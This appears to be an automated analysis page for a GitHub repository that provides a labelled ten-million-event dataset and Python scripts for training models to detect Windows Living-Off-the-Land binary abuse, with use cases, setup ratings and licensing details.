Analysis updated 2026-05-18
Train a machine learning model to detect Windows LOLBIN abuse using the pre-built labelled dataset from Zenodo
Reproduce the full ten-million-row dataset from scratch using the generation scripts and verify the labelling methodology
Use the 55 extracted behavioral features as a starting point for a SIEM detection rule or anomaly model
Benchmark a new detection model on unseen LOLBin attack scenarios not present in the training data
| daniyyell-dev/winlolbin-gt-dataset | 0-bingwu-0/live-interpreter | 0xkaz/llm-governance-dashboard | |
|---|---|---|---|
| Stars | 2 | 2 | 2 |
| Language | Python | Python | Python |
| Setup difficulty | moderate | moderate | hard |
| Complexity | 3/5 | 2/5 | 4/5 |
| Audience | researcher | general | ops devops |
Figures from each repo's GitHub metadata at analysis time.
Dataset files are on Zenodo, not in this repo, generating from scratch also requires the LOLBAS catalog and libLOL command library.
WinLOLBIN-GT is a labelled dataset created for training machine learning models to detect a specific type of attack on Windows computers. The attack technique is called Living Off the Land, which means an attacker uses built-in Windows tools that already come with the operating system to carry out malicious actions rather than installing separate malware. Because these are legitimate system tools, they are harder for traditional security software to flag. The dataset contains ten million labelled events: five million that represent normal administrative use of these Windows tools, and five million that represent malicious use patterns drawn from known attack procedures. Each event looks like a realistic process execution record, including the command line used, the parent process, file paths, user context, and a MITRE ATT&CK technique identifier that labels the attack category. A model trained on this dataset was tested on attack scenarios it had never seen and achieved 99 percent accuracy. The repository contains four Python scripts. The first generates the raw ten-million-row dataset by simulating events from the LOLBAS catalog, a public list of Windows binaries that attackers commonly abuse, and Red Canary's Atomic Red Team attack procedures. The second script processes the raw data, extracts 55 behavioral features per event, and removes fields that would leak ground-truth labels into model training. The finished dataset is hosted separately on Zenodo and is not stored in this repository. The generation scripts are licensed under MIT. The dataset files on Zenodo are released under Creative Commons BY 4.0, which requires attribution when you use them.
A ten-million-row labelled dataset and Python scripts for training ML models to detect Windows Living-Off-the-Land binary abuse, split evenly between benign and malicious process events.
Mainly Python. The stack also includes Python.
Scripts are MIT licensed, the dataset files on Zenodo are Creative Commons BY 4.0, which requires attribution when used.
Setup difficulty is rated moderate, with roughly 30min to a first successful run.
Mainly researcher.
This repo across BitVibe Labs
Verify against the repo before relying on details.